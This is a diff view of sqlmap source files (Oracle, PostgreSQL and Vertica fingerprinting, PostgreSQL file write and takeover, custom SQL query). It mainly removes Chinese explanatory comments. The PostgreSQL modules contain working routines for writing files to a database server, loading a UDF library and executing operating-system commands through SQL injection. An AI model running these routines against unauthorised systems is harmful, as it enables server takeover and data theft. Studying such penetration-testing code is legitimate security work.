# 17. 如果是直接连接,则跳过以下测试
# NOTE: SELECT NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1]) FROM DUAL does
# not work connecting directly to the Oracle database
if conf.direct:
result = True
# 18. 否则,测试数据库是否满足条件 NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])
else:
result = inject.checkBooleanExpression("NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])")
# 19. 如果测试结果为 False则输出警告信息并返回 False
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
logger.warning(warnMsg)
return False
# 20. 设置数据库类型为 Oracle
setDbms(DBMS.ORACLE)
self.getBanner()
# 21. 如果没有启用详细指纹识别,则直接返回 True
if not conf.extensiveFp:
return True
# 22. 输出开始详细指纹识别信息
infoMsg = "actively fingerprinting %s" % DBMS.ORACLE
logger.info(infoMsg)
# 23. 尝试匹配数据库版本
# Reference: https://en.wikipedia.org/wiki/Oracle_Database
for version in ("23c", "21c", "19c", "18c", "12c", "11g", "10g", "9i", "8i", "7"):
number = int(re.search(r"([\d]+)", version).group(1))
output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2))
@ -128,15 +114,15 @@ class Fingerprint(GenericFingerprint):
break
return True
# 24. 如果初始测试结果为 False则输出警告信息并返回 False
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
logger.warning(warnMsg)
return False
# 25. 强制枚举数据库对象名称为大写
def forceDbmsEnum(self):
if conf.db:
conf.db = conf.db.upper()
if conf.tbl:
conf.tbl = conf.tbl.upper()
conf.tbl = conf.tbl.upper()

72
src/sqlmap-master/plugins/dbms/postgresql/filesystem.py
Unescape View File

@ -5,91 +5,79 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 1. 导入所需的模块
import os # 操作系统相关模块
from lib.core.common import randomInt # 生成随机整数
from lib.core.compat import xrange # 兼容 Python 2 和 3 的 xrange
from lib.core.data import kb # 全局知识库
from lib.core.data import logger # 日志记录器
from lib.core.exception import SqlmapUnsupportedFeatureException # 不支持的特性异常
from lib.core.settings import LOBLKSIZE # Large Object Block Size
from lib.request import inject # 注入相关函数
from plugins.generic.filesystem import Filesystem as GenericFilesystem # 通用文件系统类
# 2. 定义一个类 Filesystem继承自 GenericFilesystem
import os
from lib.core.common import randomInt
from lib.core.compat import xrange
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.core.settings import LOBLKSIZE
from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
# 3. 构造函数,初始化变量
def __init__(self):
self.oid = None # Large Object OID
self.page = None # Large Object page number
self.oid = None
self.page = None
GenericFilesystem.__init__(self)
# 4. 使用 stacked query 读取文件
def stackedReadFile(self, remoteFile):
# 5. 如果不是暴力破解模式,则输出读取文件信息
if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg)
# 6. 初始化环境
self.initEnv()
# 7. 调用 UDF 执行读取文件操作,返回读取的内容
return self.udfEvalCmd(cmd=remoteFile, udfName="sys_fileread")
# 8. 使用 UNION query 写入文件PostgreSQL 不支持)
def unionWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
# 9. 输出不支持的信息并抛出异常
errMsg = "PostgreSQL does not support file upload with UNION "
errMsg += "query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg)
# 10. 使用 stacked query 写入文件
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
# 11. 获取本地文件大小
localFileSize = os.path.getsize(localFile)
# 12. 读取本地文件内容
content = open(localFile, "rb").read()
# 13. 生成随机 OID 和初始页码
self.oid = randomInt()
self.page = 0
# 14. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "text")
# 15. 输出调试信息
debugMsg = "create a new OID for a large object, it implicitly "
debugMsg += "adds an entry in the large objects system table"
logger.debug(debugMsg)
# References:
# http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
# http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
# 16. 删除已存在的 Large Object创建新的 Large Object并清理 Large Object 表
inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
inject.goStacked("SELECT lo_create(%d)" % self.oid)
inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid)
# 17. 循环读取文件内容,分块写入 Large Object
for offset in xrange(0, localFileSize, LOBLKSIZE):
# 18. 对文件内容进行 base64 编码
fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False)
# 19. 将 base64 编码的文件内容转换为 SQL 查询语句
sqlQueries = self.fileToSqlQueries(fcEncodedList)
# 20. 执行 SQL 查询语句
for sqlQuery in sqlQueries:
inject.goStacked(sqlQuery)
# 21. 向 Large Object 表插入数据
inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.page, self.tblField, self.fileTblName))
# 22. 清理支持表
inject.goStacked("DELETE FROM %s" % self.fileTblName)
# 23. 更新页码
self.page += 1
# 24. 输出调试信息
debugMsg = "exporting the OID %s file content to " % fileType
debugMsg += "file '%s'" % remoteFile
logger.debug(debugMsg)
# 25. 使用 lo_export 函数将 Large Object 内容导出到文件
inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, remoteFile), silent=True)
# 26. 检查文件是否写入成功
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 27. 删除 Large Object
inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
# 28. 返回文件是否写入成功
return written
return written

115
src/sqlmap-master/plugins/dbms/postgresql/fingerprint.py
Unescape View File

@ -5,35 +5,29 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 1. 从库中导入所需的模块
from lib.core.common import Backend # 后端数据库信息
from lib.core.common import Format # 格式化输出
from lib.core.common import hashDBRetrieve # 从哈希数据库检索数据
from lib.core.common import hashDBWrite # 向哈希数据库写入数据
from lib.core.data import conf # 全局配置信息
from lib.core.data import kb # 全局知识库
from lib.core.data import logger # 日志记录器
from lib.core.enums import DBMS # 数据库类型枚举
from lib.core.enums import FORK # 数据库分支枚举
from lib.core.enums import HASHDB_KEYS # 哈希数据库键枚举
from lib.core.enums import OS # 操作系统枚举
from lib.core.session import setDbms # 设置当前数据库类型
from lib.core.settings import PGSQL_ALIASES # PostgreSQL 数据库的别名
from lib.request import inject # 注入相关函数
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 通用指纹识别类
# 2. 定义一个类 Fingerprint继承自 GenericFingerprint
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import FORK
from lib.core.enums import HASHDB_KEYS
from lib.core.enums import OS
from lib.core.session import setDbms
from lib.core.settings import PGSQL_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
# 3. 构造函数,初始化数据库类型
def __init__(self):
GenericFingerprint.__init__(self, DBMS.PGSQL)
# 4. 获取指纹信息
def getFingerprint(self):
# 5. 从哈希数据库中检索数据库分支信息
fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)
# 6. 如果分支信息为空,则尝试识别数据库分支
if fork is None:
if inject.checkBooleanExpression("VERSION() LIKE '%CockroachDB%'"):
fork = FORK.COCKROACHDB
@ -53,109 +47,92 @@ class Fingerprint(GenericFingerprint):
fork = FORK.AURORA
else:
fork = ""
# 7. 将分支信息写入哈希数据库
hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork)
value = ""
# 8. 获取 Web 服务器操作系统指纹
wsOsFp = Format.getOs("web server", kb.headersFp)
# 9. 将 Web 服务器操作系统指纹添加到输出
if wsOsFp:
value += "%s\
" % wsOsFp
value += "%s\n" % wsOsFp
# 10. 如果有数据库 Banner 信息
if kb.data.banner:
# 11. 获取后端数据库操作系统指纹
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
# 12. 将后端数据库操作系统指纹添加到输出
if dbmsOsFp:
value += "%s\
" % dbmsOsFp
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
# 13. 如果不是详细指纹,则返回数据库类型和分支信息
if not conf.extensiveFp:
value += DBMS.PGSQL
if fork:
value += " (%s fork)" % fork
return value
# 14. 获取活动的指纹信息
actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
# 15. 如果有 Banner 解析指纹
if kb.bannerFp:
banVer = kb.bannerFp.get("dbmsVersion")
# 16. 如果有 Banner 版本号
if banVer:
# 17. 格式化 Banner 版本号
banVer = Format.getDbms([banVer])
value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer)
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
# 18. 获取 HTML 错误指纹
htmlErrorFp = Format.getErrorParsedDBMSes()
# 19. 将 HTML 错误指纹添加到输出
if htmlErrorFp:
value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
# 20. 如果有数据库分支信息,则将其添加到输出
if fork:
value += "\n%sfork fingerprint: %s" % (blank, fork)
# 21. 返回完整的指纹信息
return value
# 22. 检查数据库类型是否为 PostgreSQL
def checkDbms(self):
"""
References for fingerprint:
* https://www.postgresql.org/docs/current/static/release.html
"""
# 23. 如果不是详细指纹,且当前数据库类型属于 PostgreSQL 别名,则设置数据库类型为 PostgreSQL 并返回 True
if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES):
setDbms(DBMS.PGSQL)
self.getBanner()
return True
# 24. 输出正在测试的数据库类型
infoMsg = "testing %s" % DBMS.PGSQL
logger.info(infoMsg)
# 25. 执行 SQL 查询,检查数据库类型是否为 PostgreSQL (基于 CONVERT_TO 和 QUOTE_IDENT 函数)
# NOTE: Vertica works too without the CONVERT_TO()
result = inject.checkBooleanExpression("CONVERT_TO('[RANDSTR]', QUOTE_IDENT(NULL)) IS NULL")
# 26. 如果查询成功
if result:
# 27. 输出确认信息
infoMsg = "confirming %s" % DBMS.PGSQL
logger.info(infoMsg)
# 28. 执行 SQL 查询,再次确认数据库类型是否为 PostgreSQL (基于 COALESCE 函数)
result = inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]")
# 29. 如果再次确认失败,则输出警告信息,并返回 False
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warning(warnMsg)
return False
# 30. 设置数据库类型为 PostgreSQL
setDbms(DBMS.PGSQL)
# 31. 获取数据库 Banner 信息
self.getBanner()
# 32. 如果不是详细指纹,则返回 True
if not conf.extensiveFp:
return True
# 33. 输出正在进行详细指纹识别
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg)
# 34. 通过检查不同版本的函数,设置 PostgreSQL 版本
if inject.checkBooleanExpression("RANDOM_NORMAL(0.0, 1.0) IS NOT NULL"):
Backend.setVersion(">= 16.0")
elif inject.checkBooleanExpression("REGEXP_COUNT(NULL,NULL) IS NULL"):
@ -216,43 +193,39 @@ class Fingerprint(GenericFingerprint):
Backend.setVersion("< 6.2.0")
return True
# 35. 如果第一次查询失败,则输出警告信息,并返回 False
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warning(warnMsg)
return False
# 36. 检查数据库服务器的操作系统
def checkDbmsOs(self, detailed=False):
# 37. 如果已经获取到操作系统信息,则直接返回
if Backend.getOs():
return
# 38. 输出正在进行操作系统指纹识别
infoMsg = "fingerprinting the back-end DBMS operating system"
logger.info(infoMsg)
# 39. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "character(10000)")
# 40. 将 VERSION() 的结果插入到支持表中
inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()"))
# 41. 定义 Windows 操作系统特有的关键字
# Windows executables should always have ' Visual C++' or ' mingw'
# patterns within the banner
osWindows = (" Visual C++", "mingw")
# 42. 循环检查是否存在 Windows 操作系统关键字
for osPattern in osWindows:
query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField)
query += "LIKE '%" + osPattern + "%')>0"
# 43. 如果存在 Windows 操作系统关键字,则设置操作系统为 Windows
if inject.checkBooleanExpression(query):
Backend.setOs(OS.WINDOWS)
break
# 44. 如果没有检测到 Windows 操作系统,则设置操作系统为 Linux
if Backend.getOs() is None:
Backend.setOs(OS.LINUX)
# 45. 输出检测到的操作系统信息
infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
logger.info(infoMsg)
# 46. 清理支持表
self.cleanup(onlyFileTbl=True)
self.cleanup(onlyFileTbl=True)

98
src/sqlmap-master/plugins/dbms/postgresql/takeover.py
Unescape View File

@ -5,115 +5,101 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 1. 导入所需的模块
import os # 操作系统相关功能
from lib.core.common import Backend # 后端数据库信息
from lib.core.common import checkFile # 检查文件是否存在
from lib.core.common import decloakToTemp # 解密临时文件路径
from lib.core.common import flattenValue # 将嵌套列表展平
from lib.core.common import filterNone # 过滤列表中的 None 值
from lib.core.common import isListLike # 检查是否为列表类型
from lib.core.common import isNoneValue # 检查是否为 None 值
from lib.core.common import isStackingAvailable # 检查是否支持堆叠查询
from lib.core.common import randomStr # 生成随机字符串
from lib.core.compat import LooseVersion # 版本比较
from lib.core.data import kb # 全局知识库
from lib.core.data import logger # 日志记录器
from lib.core.data import paths # 路径相关信息
from lib.core.enums import OS # 操作系统枚举
from lib.core.exception import SqlmapSystemException # 系统异常
from lib.core.exception import SqlmapUnsupportedFeatureException # 不支持的特性异常
from lib.request import inject # 注入相关函数
from plugins.generic.takeover import Takeover as GenericTakeover # 通用提权类
# 2. 定义一个类 Takeover继承自 GenericTakeover
import os
from lib.core.common import Backend
from lib.core.common import checkFile
from lib.core.common import decloakToTemp
from lib.core.common import flattenValue
from lib.core.common import filterNone
from lib.core.common import isListLike
from lib.core.common import isNoneValue
from lib.core.common import isStackingAvailable
from lib.core.common import randomStr
from lib.core.compat import LooseVersion
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import OS
from lib.core.exception import SqlmapSystemException
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject
from plugins.generic.takeover import Takeover as GenericTakeover
class Takeover(GenericTakeover):
# 3. 设置远程 UDF 文件路径
def udfSetRemotePath(self):
# 4. 如果是 Windows 系统
# On Windows
if Backend.isOs(OS.WINDOWS):
# 5. UDF 文件可以放在任何 PostgreSQL 用户具有读/写/执行权限的目录
# 注意:不指定路径将保存在数据目录中
# 在 PostgreSQL 8.3 中默认路径为C:\Program Files\PostgreSQL\8.3\data
# The DLL can be in any folder where postgres user has
# read/write/execute access is valid
# NOTE: by not specifing any path, it will save into the
# data directory, on PostgreSQL 8.3 it is
# C:\Program Files\PostgreSQL\8.3\data.
self.udfRemoteFile = "%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt)
# 6. 如果是 Linux 系统
# On Linux
else:
# 7. SO 文件可以放在任何 PostgreSQL 用户具有读/写/执行权限的目录
# The SO can be in any folder where postgres user has
# read/write/execute access is valid
self.udfRemoteFile = "/tmp/%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt)
# 8. 设置本地 UDF 文件路径
def udfSetLocalPaths(self):
# 9. 设置 UDF 本地文件路径和共享库名称
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
# 10. 从 Banner 信息中获取数据库版本
self.getVersionFromBanner()
banVer = kb.bannerFp["dbmsVersion"]
# 11. 如果没有数据库版本信息,或者版本号不是数字开头,则抛出异常
if not banVer or not banVer[0].isdigit():
errMsg = "unsupported feature on unknown version of PostgreSQL"
raise SqlmapUnsupportedFeatureException(errMsg)
# 12. 如果数据库版本大于等于 10则取主版本号
elif LooseVersion(banVer) >= LooseVersion("10"):
majorVer = banVer.split('.')[0]
# 13. 如果数据库版本大于等于 8.2,则取主版本号和小版本号
elif LooseVersion(banVer) >= LooseVersion("8.2") and '.' in banVer:
majorVer = '.'.join(banVer.split('.')[:2])
# 14. 如果数据库版本小于 8.2,则抛出异常
else:
errMsg = "unsupported feature on versions of PostgreSQL before 8.2"
raise SqlmapUnsupportedFeatureException(errMsg)
# 15. 尝试获取 UDF 文件
try:
# 16. 如果是 Windows 系统
if Backend.isOs(OS.WINDOWS):
_ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_")
checkFile(_)
self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "dll"
# 17. 如果是 Linux 系统
else:
_ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_")
checkFile(_)
self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "so"
# 18. 如果找不到 UDF 文件,则抛出异常
except SqlmapSystemException:
errMsg = "unsupported feature on PostgreSQL %s (%s-bit)" % (majorVer, Backend.getArch())
raise SqlmapUnsupportedFeatureException(errMsg)
# 19. 从共享库创建 UDF
def udfCreateFromSharedLib(self, udf, inpRet):
# 20. 如果需要创建 UDF
if udf in self.udfToCreate:
logger.info("creating UDF '%s' from the binary UDF file" % udf)
inp = ", ".join(i for i in inpRet["input"])
ret = inpRet["return"]
# 21. 创建 UDF 的 SQL 语句
# Reference: http://www.postgresql.org/docs/8.3/interactive/sql-createfunction.html
# Reference: http://www.postgresql.org/docs/8.3/interactive/sql-createfunction.html
inject.goStacked("DROP FUNCTION %s(%s)" % (udf, inp))
inject.goStacked("CREATE OR REPLACE FUNCTION %s(%s) RETURNS %s AS '%s', '%s' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE" % (udf, inp, ret, self.udfRemoteFile, udf))
self.createdUdf.add(udf)
# 22. 如果不需要创建 UDF
else:
logger.debug("keeping existing UDF '%s' as requested" % udf)
# 23. 发送 UNC 路径请求
def uncPathRequest(self):
# 24. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "text")
# 25. 执行 COPY 命令,发送 UNC 路径请求
inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True)
# 26. 清理支持表
self.cleanup(onlyFileTbl=True)
# 27. 执行系统命令,并返回输出
def copyExecCmd(self, cmd):
output = None
# 28. 如果支持堆叠查询
if isStackingAvailable():
# Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
@ -123,17 +109,21 @@ class Takeover(GenericTakeover):
query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
output = inject.getValue(query, resumeValue=False)
if isListLike(output):
output = flattenValue(output)
output = filterNone(output)
if not isNoneValue(output):
output = os.linesep.join(output)
self._cleanupCmd = "DROP TABLE %s" % self.cmdTblName
inject.goStacked(self._cleanupCmd)
return output
# 29. 检查是否支持 COPY 命令执行系统命令
def checkCopyExec(self):
if kb.copyExecTest is None:
kb.copyExecTest = self.copyExecCmd("echo 1") == '1'
return kb.copyExecTest
return kb.copyExecTest

123
src/sqlmap-master/plugins/dbms/vertica/fingerprint.py
Unescape View File

@ -5,107 +5,102 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 导入必要的模块
from lib.core.common import Backend # 导入 Backend 类,用于访问后端数据库信息
from lib.core.common import Format # 导入 Format 类,用于格式化输出信息
from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.enums import DBMS # 导入 DBMS 枚举,定义数据库管理系统类型
from lib.core.session import setDbms # 导入 setDbms 函数,用于设置数据库类型
from lib.core.settings import VERTICA_ALIASES # 导入 VERTICA_ALIASES 常量,定义 Vertica 数据库的别名
from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 导入 GenericFingerprint 类,作为当前类的父类
# 定义 Fingerprint 类,继承自 GenericFingerprint
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.session import setDbms
from lib.core.settings import VERTICA_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
# 初始化 Fingerprint 类,设置数据库类型为 Vertica
def __init__(self):
GenericFingerprint.__init__(self, DBMS.VERTICA)
# 定义 getFingerprint 方法,用于获取数据库指纹信息
def getFingerprint(self):
value = "" # 初始化指纹信息字符串
wsOsFp = Format.getOs("web server", kb.headersFp) # 获取 Web 服务器操作系统信息
value = ""
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\
" % wsOsFp # 将 Web 服务器操作系统信息添加到指纹信息
value += "%s\n" % wsOsFp
if kb.data.banner: # 如果存在数据库 banner 信息
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) # 获取数据库操作系统信息
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\
" % dbmsOsFp # 将数据库操作系统信息添加到指纹信息
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: " # 添加数据库类型标签
value += "back-end DBMS: "
if not conf.extensiveFp: # 如果不需要详细指纹信息
value += DBMS.VERTICA # 将数据库类型添加到指纹信息
return value # 返回指纹信息
if not conf.extensiveFp:
value += DBMS.VERTICA
return value
actVer = Format.getDbms() # 获取数据库类型
blank = " " * 15 # 定义缩进空格
value += "active fingerprint: %s" % actVer # 添加当前指纹信息
actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp: # 如果存在数据库 banner 信息
banVer = kb.bannerFp.get("dbmsVersion") # 获取数据库版本信息
if kb.bannerFp:
banVer = kb.bannerFp.get("dbmsVersion")
if banVer:
banVer = Format.getDbms([banVer]) # 格式化数据库版本信息
value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer) # 将 banner 版本信息添加到指纹信息
banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
htmlErrorFp = Format.getErrorParsedDBMSes() # 获取 HTML 错误信息中的数据库信息
htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp) # 将 HTML 错误信息中的数据库信息添加到指纹信息
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
return value # 返回指纹信息
return value
# 定义 checkDbms 方法,用于检查数据库类型是否为 Vertica
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(VERTICA_ALIASES): # 如果不需要详细指纹并且数据库别名匹配
setDbms(DBMS.VERTICA) # 设置数据库类型为 Vertica
self.getBanner() # 获取数据库 banner 信息
return True # 返回 True
if not conf.extensiveFp and Backend.isDbmsWithin(VERTICA_ALIASES):
setDbms(DBMS.VERTICA)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.VERTICA # 输出正在测试 Vertica 的信息
infoMsg = "testing %s" % DBMS.VERTICA
logger.info(infoMsg)
# NOTE: Vertica works too without the CONVERT_TO()
result = inject.checkBooleanExpression("BITSTRING_TO_BINARY(NULL) IS NULL") # 使用 SQL 注入检查
result = inject.checkBooleanExpression("BITSTRING_TO_BINARY(NULL) IS NULL")
if result: # 如果检查结果为 True
infoMsg = "confirming %s" % DBMS.VERTICA # 输出确认是 Vertica 的信息
if result:
infoMsg = "confirming %s" % DBMS.VERTICA
logger.info(infoMsg)
result = inject.checkBooleanExpression("HEX_TO_INTEGER(NULL) IS NULL") # 使用 SQL 注入检查
result = inject.checkBooleanExpression("HEX_TO_INTEGER(NULL) IS NULL")
if not result: # 如果检查结果为 False
warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA # 输出警告信息
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA
logger.warning(warnMsg)
return False # 返回 False
setDbms(DBMS.VERTICA) # 设置数据库类型为 Vertica
self.getBanner() # 获取数据库 banner 信息
return False
if not conf.extensiveFp: # 如果不需要详细指纹信息
return True # 返回 True
setDbms(DBMS.VERTICA)
infoMsg = "actively fingerprinting %s" % DBMS.VERTICA # 输出正在进行详细指纹识别的信息
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.VERTICA
logger.info(infoMsg)
# 根据 CALENDAR_HIERARCHY_DAY(NULL) 的结果判断 Vertica 版本
if inject.checkBooleanExpression("CALENDAR_HIERARCHY_DAY(NULL) IS NULL"):
Backend.setVersion(">= 9.0") # 设置数据库版本为 >= 9.0
Backend.setVersion(">= 9.0")
else:
Backend.setVersion("< 9.0") # 设置数据库版本为 < 9.0
Backend.setVersion("< 9.0")
return True # 返回 True
else: # 如果检查结果为 False
warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA # 输出警告信息
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA
logger.warning(warnMsg)
return False # 返回 False
return False

199
src/sqlmap-master/plugins/generic/custom.py
Unescape View File

@ -5,107 +5,146 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 导入必要的模块
from lib.core.common import Backend # 导入 Backend 类,用于访问后端数据库信息
from lib.core.common import Format # 导入 Format 类,用于格式化输出信息
from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.enums import DBMS # 导入 DBMS 枚举,定义数据库管理系统类型
from lib.core.session import setDbms # 导入 setDbms 函数,用于设置数据库类型
from lib.core.settings import VERTICA_ALIASES # 导入 VERTICA_ALIASES 常量,定义 Vertica 数据库的别名
from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 导入 GenericFingerprint 类,作为当前类的父类
# 定义 Fingerprint 类,继承自 GenericFingerprint
class Fingerprint(GenericFingerprint):
# 初始化 Fingerprint 类,设置数据库类型为 Vertica
def __init__(self):
GenericFingerprint.__init__(self, DBMS.VERTICA)
from __future__ import print_function
import re
import sys
from lib.core.common import Backend
from lib.core.common import dataToStdout
from lib.core.common import getSQLSnippet
from lib.core.common import isStackingAvailable
from lib.core.convert import getUnicode
from lib.core.data import conf
from lib.core.data import logger
from lib.core.dicts import SQL_STATEMENTS
from lib.core.enums import AUTOCOMPLETE_TYPE
from lib.core.enums import DBMS
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import METADB_SUFFIX
from lib.core.settings import NULL
from lib.core.settings import PARAMETER_SPLITTING_REGEX
from lib.core.shell import autoCompletion
from lib.request import inject
from thirdparty.six.moves import input as _input
class Custom(object):
"""
This class defines custom enumeration functionalities for plugins.
"""
# 定义 getFingerprint 方法,用于获取数据库指纹信息
def getFingerprint(self):
value = "" # 初始化指纹信息字符串
wsOsFp = Format.getOs("web server", kb.headersFp) # 获取 Web 服务器操作系统信息
def __init__(self):
pass
if wsOsFp:
value += "%s\
" % wsOsFp # 将 Web 服务器操作系统信息添加到指纹信息
def sqlQuery(self, query):
output = None
sqlType = None
query = query.rstrip(';')
if kb.data.banner: # 如果存在数据库 banner 信息
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) # 获取数据库操作系统信息
try:
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
for sqlStatement in sqlStatements:
if query.lower().startswith(sqlStatement):
sqlType = sqlTitle
break
if dbmsOsFp:
value += "%s\
" % dbmsOsFp # 将数据库操作系统信息添加到指纹信息
if not re.search(r"\b(OPENROWSET|INTO)\b", query, re.I) and (not sqlType or "SELECT" in sqlType):
infoMsg = "fetching %s query output: '%s'" % (sqlType if sqlType is not None else "SQL", query)
logger.info(infoMsg)
value += "back-end DBMS: " # 添加数据库类型标签
if Backend.isDbms(DBMS.MSSQL):
match = re.search(r"(\bFROM\s+)([^\s]+)", query, re.I)
if match and match.group(2).count('.') == 1:
query = query.replace(match.group(0), "%s%s" % (match.group(1), match.group(2).replace('.', ".dbo.")))
if not conf.extensiveFp: # 如果不需要详细指纹信息
value += DBMS.VERTICA # 将数据库类型添加到指纹信息
return value # 返回指纹信息
query = re.sub(r"(?i)\w+%s\.?" % METADB_SUFFIX, "", query)
actVer = Format.getDbms() # 获取数据库类型
blank = " " * 15 # 定义缩进空格
value += "active fingerprint: %s" % actVer # 添加当前指纹信息
output = inject.getValue(query, fromUser=True)
if kb.bannerFp: # 如果存在数据库 banner 信息
banVer = kb.bannerFp.get("dbmsVersion") # 获取数据库版本信息
return output
elif not isStackingAvailable() and not conf.direct:
warnMsg = "execution of non-query SQL statements is only "
warnMsg += "available when stacked queries are supported"
logger.warning(warnMsg)
if banVer:
banVer = Format.getDbms([banVer]) # 格式化数据库版本信息
value += "\
